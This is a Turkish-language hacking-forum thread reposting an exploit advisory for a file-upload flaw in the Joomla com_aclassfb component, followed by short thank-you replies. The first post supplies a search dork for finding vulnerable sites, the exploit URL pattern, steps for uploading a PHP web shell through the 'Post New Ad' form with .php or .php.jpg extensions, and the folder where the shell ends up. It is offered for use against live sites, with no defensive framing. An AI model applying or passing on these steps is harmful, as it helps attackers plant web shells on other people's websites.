Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Joomla com_aclassfb File Upload Vulnerability
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,314 / 1,314
Deneyim: 59 / 100
Rep Sayısı: 138
Mesaj Sayısı: 5581
Üyelik Tarihi: 11.08.2013
     
Yorum: #1
Joomla com_aclassfb File Upload Vulnerability
20.01.2014 10:31
#Title : Joomla com_aclassfb File Upload Vulnerability
#Author : DevilScreaM
#Date : 10 January 2014
#Category : Web Applications
#Vendor : http://www.almondsoft.com
#Type : PHP
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Tested : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity : File Upload
#Dork : inurl:com_aclassfb

File Upload

PHP Kod:
http://127.0.0.1/index.php?option=com_aclassfb 

Exploit :
PHP Kod:
http://127.0.0.1/index.php?option=com_aclassfb&Itemid=[ID]&ct=[CATEGORY]&md=add_form 
POC :
1. kategori Seçiniz
2. Select Category sonra, “Post New Ad” tıklayın
PHP Kod:
http://127.0.0.1/index.php?option=com_aclassfb&Itemid=[ID]&ct=[CATEGORY]&md=add_form 
3. Yüklenecek shell
PHP Kod:
extension : .php .php.jpg etc 
Shell yolu:
PHP Kod:
http://127.0.0.1/component/com_aclassfb/photos/ 
Find Your Shell
(Bu konu en son: 20.01.2014 Tarihinde, Saat: 10:32 düzenlenmiştir. Düzenleyen: DaRKNeSS.)


#H4CK4L
*
avatar
#R00T
Durum: Çevrimdışı
Seviye Puanı: 43
Yaşam Puanı: 1,055 / 1,055
Deneyim: 23 / 100
Rep Sayısı: 1071
Mesaj Sayısı: 3038
Üyelik Tarihi: 04.05.2013
      
Yorum: #2
Cvp: Joomla com_aclassfb File Upload Vulnerability
20.01.2014 11:57
eline sağlık, bu joomle bir sitabil hale gelemedi (saf hali stabildir eklentiler acık yaratır) Smile Smile

Çocukken her akşam yatmadan önce Tanrı'ya bana bir bisiklet vermesi için dua ederdim. Bir gün Tanrı'nın çalışma tarzının bu olmadığını anladım. Ertesi gün gittim kendime yeni bir bisiklet çaldım ve her akşam yatmadan önce Tanrı'ya günahlarımı affetmesi için dua ettim.
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,314 / 1,314
Deneyim: 59 / 100
Rep Sayısı:
Mesaj Sayısı: 5581
Üyelik Tarihi: 11.08.2013
     
Yorum: #3
Cvp: Joomla com_aclassfb File Upload Vulnerability
20.01.2014 13:49
Eline Sağlık Abi Exciting


Hacker Peyami
*
avatar
Albay
Durum: Çevrimdışı
Seviye Puanı: 27
Yaşam Puanı: 298 / 664
Deneyim: 56 / 100
Rep Sayısı: 62
Mesaj Sayısı: 963
Üyelik Tarihi: 18.06.2013
      
Yorum: #4
Cvp: Joomla com_aclassfb File Upload Vulnerability
20.01.2014 23:35
eline sağlık abi Smile

Gölgede Yaşayanlar,Güneşi Göremezler...
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,314 / 1,314
Deneyim: 59 / 100
Rep Sayısı:
Mesaj Sayısı: 5581
Üyelik Tarihi: 11.08.2013
     
Yorum: #5
Cvp: Joomla com_aclassfb File Upload Vulnerability
21.01.2014 19:16
Ricaederim...





1 Ziyaretçi